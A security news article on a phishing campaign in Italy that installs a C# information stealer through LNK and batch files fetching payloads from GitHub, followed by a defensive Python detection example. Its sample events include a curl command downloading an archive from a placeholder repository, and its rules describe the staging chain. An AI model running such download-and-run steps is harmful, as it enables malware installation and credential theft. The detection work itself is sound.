Italian Users Warned of Malware Attack Targeting Sensitive Information

January 10, 2023

A new malware campaign has been observed targeting Italy with phishing emails designed to deploy an information stealer on compromised Windows systems.

“The data-stealer malware steals sensitive information like technique information, crypto wallet and browser histories, cookies, and credentials of crypto wallets from target devices,” Uptycs security researcher Karthickkumar Kathiresan stated in a report.

Details of the campaign were first disclosed by Milan-based IT services company SI.net last month.


The multi-stage infection sequence begins with an invoice-themed phishing email containing a link that, when clicked, downloads a password-protected ZIP archive. The archive holds two files: a shortcut (.LNK) file and a batch (.BAT) file.


Regardless of which file is launched, the attack chain remains the same, because opening the shortcut file fetches the same batch script, which is designed to install the information stealer payload from a GitHub repository. This is achieved by leveraging a legitimate PowerShell binary that is also retrieved from GitHub.

Once installed, the C#-based malware gathers system metadata and information from dozens of web browsers (e.g., cookies, bookmarks, credit cards, downloads, and credentials), as well as various cryptocurrency wallets, all of which is transmitted to an actor-controlled domain.

To mitigate such attacks, companies are advised to apply “tight security controls and multi-layered visibility and security options to identify and detect malware.”
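As an added illustration that is not taken from the Uptycs report or from this article, the following Python example applies three process-creation checks matching the chain described above: a batch file run from a user-writable folder, a PowerShell binary running outside the Windows directory, and a script host referencing GitHub-hosted content. The field names follow Sysmon Event ID 1; the folder list, rule names, default `C:\Windows` location and every sample event are assumptions constructed for the example.

```python
import ntpath
import re

SYSTEM_ROOT = "c:\\windows\\"  # assumption: default %SystemRoot% location
USER_WRITABLE = re.compile(r"\\(appdata\\local\\temp|downloads|desktop)\\")
GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com")
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def detect(ev):
    """Return the names of the rules matched by one process-creation event."""
    image, cmd = ev["image"].lower(), ev["cmdline"].lower()
    name = ntpath.basename(image)
    hits = []
    # Rule 1: cmd.exe running a batch file stored in a user-writable folder.
    if name == "cmd.exe" and re.search(r"\.(bat|cmd)\b", cmd) and USER_WRITABLE.search(cmd):
        hits.append("batch_from_user_dir")
    # Rule 2: a PowerShell binary, by file name or PE OriginalFileName, that
    # runs from outside the Windows directory (a genuine copy dropped elsewhere).
    orig = ev.get("original_filename", "").lower()
    if "powershell.exe" in (name, orig) and not image.startswith(SYSTEM_ROOT):
        hits.append("powershell_outside_system_dir")
    # Rule 3: a script host whose command line references GitHub-hosted content.
    if name in SCRIPT_HOSTS and any(h in cmd for h in GITHUB_HOSTS):
        hits.append("script_host_references_github")
    return hits

# Constructed events with Sysmon Event ID 1 style fields. Every path, file name
# and URL is a made-up placeholder, not an indicator from the report.
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\doc\invoice.bat"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c curl -L -o p.zip https://github.com/EXAMPLE-USER/EXAMPLE-REPO/raw/main/p.zip"},
    {"image": r"C:\Users\u\AppData\Local\Temp\p\powershell.exe",
     "original_filename": "PowerShell.EXE",
     "cmdline": "powershell.exe -File stage.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_filename": "PowerShell.EXE",
     "cmdline": "powershell.exe Get-ChildItem"},
]

def scan(events):
    """Map each event index to its matched rules, skipping clean events."""
    return {i: hits for i, ev in enumerate(events) if (hits := detect(ev))}

if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, EVENTS[idx]["image"], hits)
```

Rule 3 on its own is noisy on developer workstations, so it is best treated as a hunting signal to correlate with the other two rather than as a standalone alert.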



Some parts of this article are sourced from:
thehackernews.com
